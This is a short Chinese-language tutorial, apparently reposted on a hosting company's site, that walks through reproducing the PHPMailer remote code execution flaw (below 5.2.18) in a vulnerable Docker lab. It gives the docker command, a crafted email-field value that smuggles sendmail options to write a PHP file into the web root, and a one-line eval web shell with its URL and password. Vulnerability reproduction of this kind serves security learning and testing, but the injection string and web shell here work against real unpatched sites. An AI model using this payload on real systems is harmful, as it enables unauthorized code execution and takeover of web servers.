- 資訊首頁(yè) > 網(wǎng)絡(luò )安全 >
- PHPMailer中怎么復現遠程命令執行漏洞
PHPMailer中怎么復現遠程命令執行漏洞,相信很多沒(méi)有經(jīng)驗的人對此束手無(wú)策,為此本文總結了問(wèn)題出現的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。
PHPMailer是PHP電子郵件創(chuàng )建及傳輸類(lèi),用于多個(gè)開(kāi)源項目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未經(jīng)身份驗證的遠程攻擊者在Web用戶(hù)上下文中執行任意代碼,遠程控制目標web應用。
PHPMailer<5.2.18
Docker環(huán)境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去鏡像啟動(dòng)環(huán)境:
http://192.168.1.107:8080/
http://192.168.1.107:8080/在name處隨便輸入比如“aaa”,在email處輸入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話(huà)木馬:<?php@eval($_POST['thelostworld']);?>
上傳完一句話(huà)木馬后,頁(yè)面會(huì )響應3-5分鐘,響應時(shí)間較長(cháng)
木馬地址:http://192.168.1.107:8080/a.php 密碼:thelostworld
虛擬終端:
使用腳本:
獲取腳本后臺回復“PHPMailer”獲取腳本
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng )、來(lái)自互聯(lián)網(wǎng)轉載和分享為主,文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權請聯(lián)系QQ:712375056 進(jìn)行舉報,并提供相關(guān)證據,一經(jīng)查實(shí),將立刻刪除涉嫌侵權內容。
Copyright ? 2009-2021 56dr.com. All Rights Reserved. 特網(wǎng)科技 特網(wǎng)云 版權所有 珠海市特網(wǎng)科技有限公司 粵ICP備16109289號
域名注冊服務(wù)機構:阿里云計算有限公司(萬(wàn)網(wǎng)) 域名服務(wù)機構:煙臺帝思普網(wǎng)絡(luò )科技有限公司(DNSPod) CDN服務(wù):阿里云計算有限公司 中國互聯(lián)網(wǎng)舉報中心 增值電信業(yè)務(wù)經(jīng)營(yíng)許可證B2
建議您使用Chrome、Firefox、Edge、IE10及以上版本和360等主流瀏覽器瀏覽本網(wǎng)站